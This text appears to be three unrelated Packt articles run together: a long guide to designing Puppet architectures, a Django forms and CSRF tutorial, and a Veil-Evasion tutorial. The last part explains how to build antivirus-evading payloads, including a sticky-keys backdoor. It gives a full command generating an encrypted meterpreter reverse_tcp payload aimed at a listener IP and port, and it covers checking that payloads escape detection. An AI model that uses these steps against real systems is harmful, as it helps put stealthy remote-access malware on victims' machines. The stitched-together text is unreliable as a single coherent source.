Designing Puppet Architectures

Packt
18 Jun 2014
21 min read
Puppet is an extensible automation framework, a tool, and a language. We can do great things with it, and we can do them in many different ways. Besides the technicalities of learning the basics of its DSL, one of the biggest challenges for new and not-so-new users of Puppet is to organize code and put things together in a manageable and appropriate way. It's hard to find comprehensive documentation on how to use public code (modules) alongside our custom modules and data, where to place our logic, how to maintain and scale it, and, generally, how to manage safely and effectively the resources we want on our nodes and the data that defines them.

There's no single answer that fits all these cases. There are best practices, recommendations, and many debates in the community, but ultimately it all depends on our own needs and infrastructure, which vary according to multiple factors, such as the following:

- The number and variety of nodes and application stacks to manage
- The infrastructure design and the number of data centers or separate networks to manage
- The number and skills of the people who work with Puppet
- The number of teams who work with Puppet
- Puppet's presence and integration with other tools
- Policies for change in production

In this article, we will outline the elements needed to design a Puppet architecture, reviewing the following elements in particular:

- The tasks to deal with (managing nodes, data, code, files, and so on) and the available components to manage them
- The Foreman, which is probably the most widely used ENC around, together with Puppet Enterprise
- The pattern of roles and profiles
- Data separation challenges and issues
- How the various components can be used together in different ways, with some sample setups

The components of Puppet architecture

With Puppet, we manage our systems via the catalog that the Puppet Master compiles for each node.
This is the total of the resources we have declared in our code, based on the parameters and variables whose values reflect our logic and needs. Most of the time, we also provide configuration files, either as static files or via ERB templates populated according to the variables we have set.

We can identify the following major tasks when we have to manage what we want to configure on our nodes:

- Definition of the classes to be included in each node
- Definition of the parameters to use for each node
- Definition of the configuration files provided to the nodes

These tasks can be provided by different, partly interchangeable components, which are as follows:

- site.pp is the first file parsed by the Puppet Master (by default, its path is /etc/puppet/manifests/site.pp) and, eventually, all the files that are imported from there (import nodes/*.pp would import and parse all the code defined in the files with the .pp suffix in the /etc/puppet/manifests/nodes/ directory). Here, we have code in the Puppet language.

- An ENC (External Node Classifier) is an alternative source that can be used to define the classes and parameters to apply to nodes. It's enabled with the following lines in the Puppet Master's puppet.conf:

      [master]
        node_terminus = exec
        external_nodes = /etc/puppet/node.rb

  The script referenced by the external_nodes parameter can use any backend; it's invoked with the client's certname as the first argument (/etc/puppet/node.rb web01.example.com) and should return YAML-formatted output that defines the classes to include for that node, the parameters, and the Puppet environment to use. Besides well-known Puppet-specific ENCs such as The Foreman and Puppet Dashboard (a former Puppet Labs project now maintained by community members), it's not uncommon to write new custom ones that leverage existing tools and infrastructure-management solutions.
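To make the ENC contract concrete, here is a minimal, illustrative classifier written in Python rather than Ruby. The classification table, the default values, and the hand-built YAML are assumptions for the sketch, not part of the setup described above:

```python
#!/usr/bin/env python
# Minimal illustrative ENC: invoked with a node's certname as the first
# argument, it prints YAML defining the classes and environment for that
# node. The classification table below is a made-up example.
import sys

NODES = {
    'web01.example.com': {
        'classes': ['general', 'apache'],
        'environment': 'production',
    },
}

DEFAULT = {'classes': ['general'], 'environment': 'production'}

def classify(certname):
    """Return the YAML document Puppet expects for this certname."""
    node = NODES.get(certname, DEFAULT)
    lines = ['---', 'classes:']
    lines.extend('  - %s' % c for c in node['classes'])
    lines.append('environment: %s' % node['environment'])
    return '\n'.join(lines)

if __name__ == '__main__':
    certname = sys.argv[1] if len(sys.argv) > 1 else 'web01.example.com'
    print(classify(certname))
```

Pointing external_nodes at an executable script like this is all that's needed; Puppet only cares about the YAML on stdout, not the language the script is written in.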
- LDAP can be used to store node information (classes, environment, and variables) as an alternative to an ENC. To enable LDAP integration, add the following lines to the Master's puppet.conf:

      [master]
        node_terminus = ldap
        ldapserver = ldap.example.com
        ldapbase = ou=Hosts,dc=example,dc=com

  Then, we have to add Puppet's schema to our LDAP server. For more information and details, refer to http://docs.puppetlabs.com/guides/ldap_nodes.html.

- Hiera is the hierarchical key-value datastore. It is embedded in Puppet 3 and available as an add-on for previous versions. Here, we can set parameters, but also include classes and eventually provide content for files.

- Public modules can be retrieved from Puppet Forge, GitHub, or other sources; they typically manage applications and system settings. Being public, they might not fit all our custom needs, but they are supposed to be reusable, support different OSes, and adapt to different use cases. We are supposed to be able to use them without any modification, as if they were public libraries, committing our fixes and enhancements back to the upstream repository. A common but less recommended alternative is to fork a public module and adapt it to our needs. This might seem the quicker solution, but it doesn't really help the open source ecosystem and prevents us from benefiting from updates to the original repository.

- Site module(s) are custom modules with local resources and files, where we can place all the logic we need or the resources we can't manage with public modules. There may be one or more of them, and they may be called site or take the name of our company, customer, or project. Site modules make particular sense as a companion to public modules used without local modifications: in site modules, we can place local settings, files, custom logic, and resources.
The distinction between public reusable modules and site modules is purely formal; they are both Puppet modules with a standard structure. It might make sense to place the ones we develop internally in a dedicated directory (in the module path), different from the one where we place shared modules downloaded from public sources.

Let's see how these components might fit our Puppet tasks.

Defining the classes to include in each node

This is what we typically talk about when we refer to node classification in Puppet: the task that the Puppet Master accomplishes when it receives a request from a client node and has to determine the classes and parameters to use for that specific node. Node classification can be done in the following different ways:

- We can use the node declaration in site.pp and other manifests eventually imported from there. In this way, we identify each node by certname and declare all the resources and classes we want for it, as shown in the following code:

      node 'web01.example.com' {
        include ::general
        include ::apache
      }

  Here, we may even decide to follow a nodeless layout, where we don't use the node declaration at all and rely on facts to manage the classes and parameters to be assigned to our nodes. An example of this approach is examined later in this article.

- On an ENC, we can define the classes (and parameters) that each node should have. The returned YAML for our simple case would be something like the following:

      ---
      classes:
        - general:
        - apache:
      parameters:
        dns_servers:
          - 8.8.8.8
          - 8.8.4.4
        smtp_server: smtp.example.com
      environment: production

- Via LDAP, we can have a hierarchical structure where a node can inherit the classes (referenced with the puppetClass attribute) set in a parent node (parentNode).

- Via Hiera, using the hiera_include function: just add hiera_include('classes') in site.pp, then define, under the key named classes at the relevant levels of our hierarchy, what to include for each node.
  For example, with a YAML backend, our case would be represented with the following lines:

      ---
      classes:
        - general
        - apache

- In site module(s), any custom logic can be placed: for example, the classes and resources to include for all the nodes or for specific groups of nodes.

Defining the parameters to use for each node

This is another crucial part, as with parameters we can characterize our nodes and define the resources we want for them. Generally, to identify and characterize a node, in order to differentiate it from the others and provide the specific resources we want for it, we need very few key parameters, such as the following (the names used here may be common, but they are arbitrary and are not Puppet's internal ones):

- role is almost a de facto standard name to identify the kind of server. A node is supposed to have just one role, which might be something like webserver, app_be, db, or anything that identifies the function of the node. Note that web servers that serve different web applications should have different roles (that is, webserver_site, webserver_blog, and so on). We can have one or more nodes with the same role.

- env, or any name that identifies the operational environment of the node (whether it is a development, test, qa, or production server). Note that this doesn't necessarily match Puppet's internal environment variable. Some prefer to merge the env information into role, having roles such as webserver_prod and webserver_devel.

- zone, site, data center, country, or any parameter that might identify the network, country, availability zone, or data center where the node is placed. A node is supposed to belong to only one of these. We might not need this in our infrastructure.

- tenant, component, application, project, and cluster might be other kinds of variables that characterize our node. There's no real standard for their naming, and their usage and necessity strictly depend on the underlying infrastructure.
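Identifying parameters like these are often derived automatically from data the node already has and shipped as facts. As a hedged sketch of the idea, the following script parses them out of a hostname; the naming convention (role-number.env.zone.example.com) is an assumption for illustration, and a real setup would deliver this via custom facts or Facter's external facts mechanism:

```python
#!/usr/bin/env python
# Illustrative external-fact script: derive role, env, and zone from an FQDN
# like 'web01.prod.it.example.com'. The naming convention is a made-up
# assumption; real infrastructures must adapt the parsing to their own.
import re
import socket

def identify(fqdn):
    """Return a dict of identifying facts parsed from the FQDN."""
    short, _, domain = fqdn.partition('.')
    # Strip trailing digits from the short hostname to get the role.
    match = re.match(r'([a-z_]+)\d*$', short)
    role = match.group(1) if match else 'unknown'
    parts = domain.split('.')
    env = parts[0] if len(parts) > 2 else 'production'
    zone = parts[1] if len(parts) > 3 else 'default'
    return {'role': role, 'env': env, 'zone': zone}

if __name__ == '__main__':
    # External facts are emitted as key=value pairs on stdout.
    for key, value in sorted(identify(socket.getfqdn()).items()):
        print('%s=%s' % (key, value))
```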
With parameters such as these, any node can be fully identified and served with its specific configuration. It makes sense to provide them, where possible, as facts.

The parameters we use in our manifests may have a different nature:

- role/env/zone, as defined earlier, are used to identify the nodes; they are typically used to determine the values of other parameters
- OS-related parameters, such as package names and file paths
- Parameters that define the services of our infrastructure (DNS servers, NTP servers, and so on)
- Usernames and passwords, which should be kept reserved, used to manage credentials
- Parameters that express any further custom logic and classifying need (master, slave, host_number, and so on)
- Parameters exposed by the parameterized classes or defines we use

Often, the values of some parameters depend on the values of others. For example, the DNS or NTP server may change according to the zone or region of a node. When we start to design our Puppet architecture, it's important to have a general idea of the variations involved and the possible exceptions, as we will probably define our logic according to them. As a general rule, we will use the identifying parameters (role/env/zone) to define most of the other parameters most of the time, so we'll probably need to use them in our Hiera hierarchy or in Puppet selectors. This also means that we will probably need to set them as top scope variables (for example, via an ENC) or facts.

As with the classes to be included, parameters may be set by various components; some of them are actually the same, as in Puppet a node's classification involves both the classes to include and the parameters to apply. These components are:

- In site.pp, we can set variables. If they are outside node definitions, they are at top scope; if they are inside, they are at node scope. Top scope variables should be referenced with a :: prefix, for example, $::role.
  Node scope variables are available inside the node's classes with their plain name, for example, $role.

- An ENC returns parameters, treated as top scope variables, alongside classes, and the logic of how they are set depends entirely on its structure. Popular ENCs such as The Foreman, Puppet Dashboard, and the Puppet Enterprise Console allow users to set variables for single nodes or for groups, often in a hierarchical fashion. The kind and amount of parameters set here depend on how much information we want to manage on the ENC and how much we manage somewhere else.

- LDAP, when used as a node classifier, returns variables for each node as defined with the puppetVar attribute. They are all set at top scope.

- In Hiera, we set keys that we can map to Puppet variables with the hiera(), hiera_array(), and hiera_hash() functions inside our Puppet code. Puppet 3's data bindings automatically map class parameters to Hiera keys, so in those cases, we don't have to explicitly use the hiera* functions. The defined hierarchy determines how the keys' values change according to the values of other variables. In Hiera, ideally, we should place variables related to our infrastructure and credentials, but not OS-related variables (those should stay in modules if we want them to be reusable). A lot of documentation about Hiera shows sample hierarchies with facts such as osfamily and operatingsystem. In my very personal opinion, such variables should not stay there (they weigh down the hierarchy), as OS differences should be managed in the classes and modules used, not in Hiera.

- In public shared modules, we typically deal with OS-specific parameters. Modules should be considered reusable components that know everything about how to manage an application on different OSes but nothing about our custom logic. They should expose parameters and defines that allow users to determine their behavior and fit their own needs.
- In site module(s), we may place infrastructural parameters, credentials, and any custom logic, more or less based on other variables.

- Finally, it's possible, and generally recommended, to create custom facts that identify the node directly from the agent. An example of this approach is a totally facts-driven infrastructure, where all the node-identifying variables, upon which all the other parameters are defined, are set as facts.

Defining the configuration files provided to the nodes

It's almost certain that we will need to manage configuration files with Puppet and that we will need to store them somewhere, either as plain static files served via Puppet's fileserver functionality (using the source argument of the file type) or as .erb templates. While it's possible to configure custom fileserver shares for static files and absolute paths for templates, it's definitely recommended to rely on the modules' autoloading conventions and place such files inside custom or public modules, unless we decide to use Hiera for them. Configuration files, therefore, are typically placed in:

- Public modules: These may provide default templates that use variables exposed as parameters by the module's classes and defines. As users, we don't directly manage the module's template but the variables used inside it. A good, reusable module should allow us to override the default template with a custom one; in this case, our custom template should be placed in a site module. If we've forked a public shared module and maintain a custom version, we might be tempted to place all our custom files and templates there. Doing so, we lose reusability and gain, perhaps, some short-term simplicity.

- Site module(s): These are, instead, a more correct place for custom files and templates if we want to maintain a setup based on unforked public shared modules plus custom site ones, where all our stuff stays confined in one or a few modules.
  This allows us to recreate similar setups just by copying and modifying our site modules, as all our logic, files, and resources are concentrated there.

- Hiera: Thanks to the smart hiera-file backend, Hiera can be an interesting alternative place to store configuration files, both static ones and templates. We can benefit from the hierarchy logic, which works for us, and manage any kind of file without touching modules.

- Custom fileserver mounts can be used to serve any kind of static file from any directory of the Puppet Master. They can be useful if we need to provide, via Puppet, files generated or managed by third-party scripts or tools. An entry in /etc/puppet/fileserver.conf like the following:

      [data]
        path /etc/puppet/static_files
        allow *.example.com

  allows serving a file like /etc/puppet/static_files/generated/file.txt with the argument:

      source => 'puppet:///data/generated/file.txt',

Defining custom resources and classes

We'll probably need to provide to our nodes custom resources that are not declared in the shared modules, because these resources are too specific. We'll probably also want to create some grouping classes, for example, to manage the common baseline of resources and classes we want applied to all our nodes. This is typically a bunch of custom code and logic that we have to place somewhere. The usual locations are as follows:

- Shared modules: These are forked and modified to include custom resources; as already outlined, this approach doesn't pay off in the long term.
- Site module(s): These are the preferred place for custom stuff, including classes where we can manage common baselines, role classes, and other container classes.
- Hiera, partially, if we are fond of the create_resources function fed by hashes provided in Hiera. In this case, somewhere (in a site or shared module, or maybe even in site.pp), we have to place the create_resources statements.
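As an illustration of how the identifying parameters discussed earlier (role, env, zone) typically drive data lookups, a Puppet 3-era hiera.yaml might look like the following sketch; the paths and hierarchy levels are assumptions, not a prescribed setup:

```yaml
# /etc/puppet/hiera.yaml -- illustrative Hiera 1.x configuration
:backends:
  - yaml
:hierarchy:
  - "nodes/%{::clientcert}"   # per-node overrides
  - "role/%{::role}"          # values that depend on the node's role
  - "env/%{::env}"            # operational environment overrides
  - "zone/%{::zone}"          # zone-bound services (DNS, NTP, and so on)
  - common                    # defaults
:yaml:
  :datadir: /etc/puppet/hieradata
```

A lookup walks the hierarchy top to bottom, so a per-node or per-role value wins over the defaults in common.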
The Foreman

The Foreman is definitely the biggest open source software product related to Puppet that is not directly developed by Puppet Labs. The project was started by Ohad Levy, who now works at Red Hat and leads its development, supported by a great team of internal employees and community members.

The Foreman can work as a Puppet ENC and reporting tool; it presents an alternative to the Inventory System; and, most of all, it can manage the whole lifecycle of a system, from provisioning to configuration and decommissioning. Some of its features have been quite ahead of their time. For example, the foreman() function made possible, long before PuppetDB was even conceived, what is done now with the puppetdbquery module: direct queries of all the data gathered by The Foreman — facts, node classifications, and Puppet run reports. Let's look at this example, which assigns to the $web_servers variable the list of hosts that belong to the web hostgroup and have reported successfully in the last hour:

    $web_servers = foreman('hosts', 'hostgroup ~ web and status.failed = 0 and last_report < "1 hour ago"')

The Foreman really deserves at least a book by itself, so here we will just summarize its features and explore how it can fit in a Puppet architecture. We can decide which components to use:

- Systems provisioning and lifecycle management
- Node IP addressing and naming
- The Puppet ENC function, based on a complete web interface
- Management of client certificates on the Puppet Master
- The Puppet reporting function, with a powerful query interface
- The facts-querying function, equivalent to the Puppet Inventory system

For some of these features, we may need to install Foreman's Smart Proxies on some infrastructural servers. The proxies are registered on the central Foreman server and provide a way to remotely control the relevant services (DHCP, PXE, DNS, Puppet Master, and so on).
The web GUI, based on Rails, is quite complete and appealing, but it might prove cumbersome when we have to deal with a large number of nodes. For this reason, we can also manage Foreman via the CLI. The original foreman-cli command has been around for years but is now deprecated in favor of the new hammer (https://github.com/theforeman/hammer-cli) with the Foreman plugin, which is very versatile and powerful, as it allows us to manage via the command line most of what we can do on the web interface.

Roles and profiles

In 2012, Craig Dunn wrote a blog post (http://www.craigdunn.org/2012/05/239/) that quickly became a point of reference on how to organize Puppet code. He discussed his concept of roles and profiles.

The role describes what the server represents: a live web server, a development web server, a mail server, and so on. Each node can have one and only one role. Note that in his post, he manages environments inside roles (two web servers in two different environments have two different roles):

    node www1 {
      include ::role::www::dev
    }
    node www2 {
      include ::role::www::live
    }
    node smtp1 {
      include ::role::mailserver
    }

He then introduces the concept of profiles, which include and manage modules to define a logical technical stack. A role can include one or more profiles:

    class role {
      include profile::base
    }
    class role::www inherits role {
      include ::profile::tomcat
    }

In environment-related subroles, we can manage the exceptions we need (here, for example, the www::dev role includes both the database and webserver::dev profiles):

    class role::www::dev inherits role::www {
      include ::profile::webserver::dev
      include ::profile::database
    }
    class role::www::live inherits role::www {
      include ::profile::webserver::live
    }

The use of class inheritance here is not mandatory, but it is useful to minimize code duplication.
This model expects modules to be the only components where resources are actually defined and managed; they are supposed to be reusable (we use them without modifying them) and to manage only the components they are written for.

In profiles, we can manage resources and the ordering of classes; we can initialize variables and use them as values for arguments in the declared classes; and we can generally benefit from having an extra layer of abstraction:

    class profile::base {
      include ::networking
      include ::users
    }
    class profile::tomcat {
      class { '::jdk': }
      class { '::tomcat': }
    }
    class profile::webserver {
      class { '::httpd': }
      class { '::php': }
      class { '::memcache': }
    }

In profile subclasses, we can manage exceptions or particular cases:

    class profile::webserver::dev inherits profile::webserver {
      Class['::php'] {
        loglevel => 'debug',
      }
    }

This model is quite flexible and has gained a lot of attention and endorsement from Puppet Labs. It's not the only approach we can follow to organize the resources we need for our nodes in a sane way, but it is the current best practice and a good point of reference, as it formalizes the concept of role and shows how we can organize and add layers of abstraction between our nodes and the modules we use.

The data and the code

Hiera's crusade, and possibly its main reason to exist, is data separation. In practical terms, this means converting Puppet code like the following:

    $dns_server = $zone ? {
      'it'    => '1.2.3.4',
      default => '8.8.8.8',
    }
    class { '::resolver':
      server => $dns_server,
    }

into something with no trace of local settings, like:

    $dns_server = hiera('dns_server')
    class { '::resolver':
      server => $dns_server,
    }

With Puppet 3, the preceding code can be simplified even further to just the following line:

    include ::resolver

This expects the resolver::server key to be evaluated as needed in our Hiera data sources.
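With the data-bindings approach just shown, the value lives in a Hiera data source as a fully qualified key; for example, in a YAML backend file (the path and values are arbitrary examples):

```yaml
# e.g. hieradata/common.yaml (or a zone-specific data source)
dns_server: '8.8.8.8'        # looked up explicitly with hiera('dns_server')
resolver::server: '8.8.8.8'  # bound automatically to the resolver class parameter
```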
The advantages of having data (in this case, the IP of the DNS server, whatever the logic used to derive it) in a separate place are clear:

- We can manage and modify data without changing our code
- Different people can work on data and on code
- Hiera's pluggable backend system dramatically enhances how and where data can be managed, allowing seamless integration with third-party tools and data sources
- Code layout is simpler and more error proof
- The lookup hierarchy is configurable

Nevertheless, there are a few little drawbacks, or maybe just necessary side effects or evolutionary steps:

- What we've learned about Puppet and used to do without Hiera becomes obsolete
- We don't see, directly in our code, the values we are using
- We have two different places to look at to understand what the code does
- We need to set the variables we use in our hierarchy as top scope variables or facts, or, in any case, refer to them with a fixed, fully qualified name
- We might have to refactor a lot of existing code to move our data and logic into Hiera

A personal note: I've been quite a late jumper on the Hiera wagon. While developing modules with the ambition that they could be reusable, I decided I couldn't exclude users who weren't using this additional component, so until Puppet 3, with Hiera integrated in it, became mainstream, I didn't want to force the usage of Hiera in my code. Now things are different. Puppet 3's data bindings change the whole scene; Hiera is deeply integrated and is here to stay. So, even if we can happily live without it, I would definitely recommend its usage in most cases.
Adding a developer with Django forms

Packt
18 Jun 2014
8 min read
When displaying the form, the form object will generate the contents of the form template. We may change the type of field that the object sends to the template if needed. When receiving the data, the object will check the contents of each form element. If there is an error, the object will send a clear error to the client. If there is no error, we are certain that the form data is correct.

CSRF protection

Cross-Site Request Forgery (CSRF) is an attack that targets a user who is loading a page that contains a malicious request. The malicious script uses the authentication of the victim to perform unwanted actions, such as changing data or accessing sensitive data. The following steps are executed during a CSRF attack:

1. Script injection by the attacker.
2. An HTTP query is performed to get a web page.
3. Downloading the web page that contains the malicious script.
4. Malicious script execution.

In this kind of attack, the hacker can also modify information that may be critical for the users of the website. Therefore, it is important for a web developer to know how to protect their site against this kind of attack, and Django will help with this.

To re-enable CSRF protection, we must edit the settings.py file and uncomment the following line:

    'django.middleware.csrf.CsrfViewMiddleware',

This protection ensures that the data that has been sent was really sent from the expected page. You can check this in two easy steps:

1. When creating an HTML or Django form, we insert a CSRF token that the server will store. When the form is sent, the CSRF token is sent too.
2. When the server receives the request from the client, it checks the CSRF token. If it is valid, it validates the request.

Do not forget to add the CSRF token in all the forms of the site where protection is enabled. HTML forms are also involved, and the one we have just made does not include the token.
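The token check described above can be sketched in a few lines of plain Python. This is only an illustration of the principle — the helper names are hypothetical, and it is not Django's actual implementation:

```python
# Sketch of the CSRF-token principle: the server stores a random token in the
# user's session and embeds the same token in every form it renders; on
# submission, the two must match. Hypothetical helpers, not the Django API.
import hmac
import secrets

def issue_token(session):
    """Generate a token, store it server-side, and return it for the form."""
    session['csrf_token'] = secrets.token_hex(16)
    return session['csrf_token']

def is_valid_request(session, submitted_token):
    """Accept a POST only if it carries the token stored in the session."""
    expected = session.get('csrf_token', '')
    # Constant-time comparison avoids leaking information through timing.
    return hmac.compare_digest(expected, submitted_token)
```

A request forged from another site cannot read the victim's token, so its POST fails this check.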
For the previous form to work with CSRF protection, we need to add the following line between the <form> and </form> tags:

    {% csrf_token %}

The view with a Django form

We will first write the view that contains the form, because the template will display the form defined in the view. Django forms can be stored in separate files, such as forms.py, at the root of the project. We include them directly in our view because the form will only be used on this page. Depending on the project, you must choose which architecture suits you best. We will create our view in the views/create_developer.py file with the following lines:

    from django.shortcuts import render
    from django.http import HttpResponse
    from TasksManager.models import Supervisor, Developer
    # This line imports the Django forms package
    from django import forms

    class Form_inscription(forms.Form):
        # This creates the form with four fields. It is an object that
        # inherits from forms.Form; its attributes define the form fields.
        name       = forms.CharField(label="Name", max_length=30)
        login      = forms.CharField(label="Login", max_length=30)
        password   = forms.CharField(label="Password", widget=forms.PasswordInput)
        supervisor = forms.ModelChoiceField(label="Supervisor", queryset=Supervisor.objects.all())

    # View for create_developer
    def page(request):
        if request.POST:
            # If the form has been posted, create the variable that will
            # contain our form filled with the data sent by POST.
            form = Form_inscription(request.POST)
            if form.is_valid():
                # is_valid() checks that the data sent by the user is
                # consistent with the fields defined in the form.
                # cleaned_data retrieves the values sent by the client,
                # filtered by the clean() method that we will see later.
                # This way of recovering data provides secure data.
                name = form.cleaned_data['name']
                login = form.cleaned_data['login']
                password = form.cleaned_data['password']
                # The supervisor variable is of the Supervisor type: the data
                # returned in the cleaned_data dictionary is directly a model
                # instance.
                supervisor = form.cleaned_data['supervisor']
                new_developer = Developer(name=name, login=login, password=password, email="", supervisor=supervisor)
                new_developer.save()
                return HttpResponse("Developer added")
            else:
                # To send the form to the template, just send it like any
                # other variable. We send it when the form is not valid in
                # order to display the user's errors.
                return render(request, 'en/public/create_developer.html', {'form': form})
        else:
            # The user has not yet submitted the form: instantiate it with no
            # data inside.
            form = Form_inscription()
            return render(request, 'en/public/create_developer.html', {'form': form})

This screenshot shows the display of the form with an error message.

Template of a Django form

We set the template for this view. The template will be much shorter:

    {% extends "base.html" %}
    {% block title_html %}
      Create Developer
    {% endblock %}
    {% block h1 %}
      Create Developer
    {% endblock %}
    {% block article_content %}
      <form method="post" action="{% url "create_developer" %}" >
        {% csrf_token %} <!-- This line inserts a CSRF token. -->
        <table>
          {{ form.as_table }} <!-- This line displays the rows of the form. -->
        </table>
        <p><input type="submit" value="Create" /></p>
      </form>
    {% endblock %}

As the complete form operation is in the view, the template simply executes the as_table() method to generate the HTML form. The previous code displays the data in tabular form. The three methods to generate an HTML form structure are as follows:

- as_table: This displays the fields in <tr> <td> tags
- as_ul: This displays the form fields in <li> tags
- as_p: This displays the form fields in <p> tags

So, we quickly wrote a secure form, with error handling and CSRF protection, using Django forms.
The form based on a model ModelForms are Django forms based on models. The fields of these forms are automatically generated from the model that we have defined. Indeed, developers are often required to create forms with fields that correspond to those in the database to a non-MVC website. These particular forms have a save() method that will save the form data in a new record. The supervisor creation form To broach ModelForms, we will take, for example, the addition of a supervisor. For this, we will create a new page. For this, we will create the following URL: url(r'^create-supervisor$', 'TasksManager.views.create_supervisor.page', name="create_supervisor"), Our view will contain the following code: from django.shortcuts import render from TasksManager.models import Supervisor from django import forms from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse def page(request): if len(request.POST) > 0: form = Form_supervisor(request.POST) if form.is_valid(): form.save(commit=True) # If the form is valid, we store the data in a model record in the form. return HttpResponseRedirect(reverse('public_index')) # This line is used to redirect to the specified URL. We use the reverse() function to get the URL from its name defines urls.py. else: return render(request, 'en/public/create_supervisor.html', {'form': form}) else: form = Form_supervisor() return render(request, 'en/public/create_supervisor.html', {'form': form}) class Form_supervisor(forms.ModelForm): # Here we create a class that inherits from ModelForm. class Meta: # We extend the Meta class of the ModelForm. It is this class that will allow us to define the properties of ModelForm. model = Supervisor # We define the model that should be based on the form. exclude = ('date_created', 'last_connexion', ) # We exclude certain fields of this form. It would also have been possible to do the opposite. 
That is to say, with the fields property, we would have defined the fields we want in the form. As seen in the line exclude = ('date_created', 'last_connexion', ), it is possible to restrict the form fields. Both the exclude and fields properties must be used correctly; they receive, as arguments, a tuple of the fields to exclude or include. They can be described as follows:

- exclude: This is used when the form is accessible to an administrator, because if you later add a field to the model, it will automatically be included in the form.
- fields: This is used when the form is accessible to ordinary users, because if you later add a field to the model, it will not be visible to them.

For example, imagine a website selling royalty-free images with a registration form based on ModelForm. Suppose the administrator adds a credit field to the extended model of the user. If the developer had used the exclude property without adding credit to it, the user would be able to take as many credits as he/she wants.

We will reuse our previous template, changing only the URL in the action attribute of the <form> tag:

```
{% url "create_supervisor" %}
```

This example shows that ModelForms can save a lot of development time by providing a form that can still be customized (by modifying the validation, for example).

Summary

This article discussed Django forms. It explained how to create forms with Django and how to process them.

Resources for Article:

Further resources on this subject:
- So, what is Django? [article]
- Creating an Administration Interface in Django [article]
- Django Debugging Overview [article]

Packt
18 Jun 2014
6 min read

Veil-Evasion

(For more resources related to this topic, see here.)

A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which include the following:

- It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python
- It can use Metasploit-generated shellcode
- It can integrate third-party tools such as Hyperion (which encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory
- The Veil-Evasion_evasion.cna script allows Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike
- Payloads can be generated and seamlessly substituted into all PsExec calls
- Users have the ability to reuse shellcode or implement their own encryption methods
- Its functionality can be scripted to automate deployment
- Veil-Evasion is under constant development, and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system)

Veil-Evasion can generate an exploit payload; the standalone payloads include the following options:

- A minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity.
- A sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor.
- A PowerShell shellcode injector.
When the payloads have been created, they can be delivered to the target in one of the following two ways:

- Upload and execute using Impacket and the PTH toolkit
- UNC invocation

Veil-Evasion is available from the Kali repositories and is installed by simply entering apt-get install veil-evasion at a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script.

Veil-Evasion presents the user with the main menu, which shows the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot:

Veil-Evasion is undergoing rapid development, with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot:

To obtain information on a specific payload, type info <payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload:

The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack.

The required options include the names of the options as well as their default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value.
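The expire_payload behavior described above boils down to comparing the current time against a deadline fixed at generation time. A minimal, toy sketch of that idea (this is an illustration of the concept, not Veil-Evasion's actual implementation):

```python
import time

def make_expiring_payload(lifetime_seconds, clock=time.time):
    """Returns a callable that refuses to run after its deadline.
    A toy illustration of the expire_payload idea; the names and
    the clock parameter are assumptions made for demonstration."""
    deadline = clock() + lifetime_seconds

    def payload():
        if clock() > deadline:
            return 'inoperable'   # past the expiry window
        return 'executed'
    return payload

# A fake clock makes the expiry deterministic to demonstrate.
now = [1000.0]
payload = make_expiring_payload(60, clock=lambda: now[0])
print(payload())        # within the 60-second window
now[0] += 120           # pretend two minutes pass
print(payload())        # past the window: no longer operable
```

The real option works at the payload level on the victim's machine, but the time-gate logic is the same: once the window closes, execution is refused.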
To accept the default options and create the exploit, type generate at the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of \x01\x02, without quotes and without newlines (\n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot:

In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot:

The user will then be presented with the output menu and a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, you will have the option of either using Pyinstaller to create the EXE file or generating Py2Exe files, as shown in the following screenshot:

The final screen displays information on the generated payload, as shown in the following screenshot:

The exploit could also have been created directly from the command line using the following options:

```
kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444
```

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and its behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour.
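Custom shellcode has to be typed as a bare \x01\x02-style string. Converting raw bytes into that form is a small formatting task; the helper below is an assumption-laden convenience sketch, not part of Veil-Evasion itself:

```python
def to_veil_shellcode(raw: bytes) -> str:
    """Render raw shellcode bytes in the \\x01\\x02 form that the
    custom-shellcode prompt expects: no quotes, no newlines, just
    consecutive \\xNN escapes. (Helper name is hypothetical.)"""
    return ''.join('\\x{:02x}'.format(b) for b in raw)

# First few bytes of a typical Windows payload stub, for illustration.
stub = bytes([0xfc, 0xe8, 0x82, 0x00])
print(to_veil_shellcode(stub))   # \xfc\xe8\x82\x00
```

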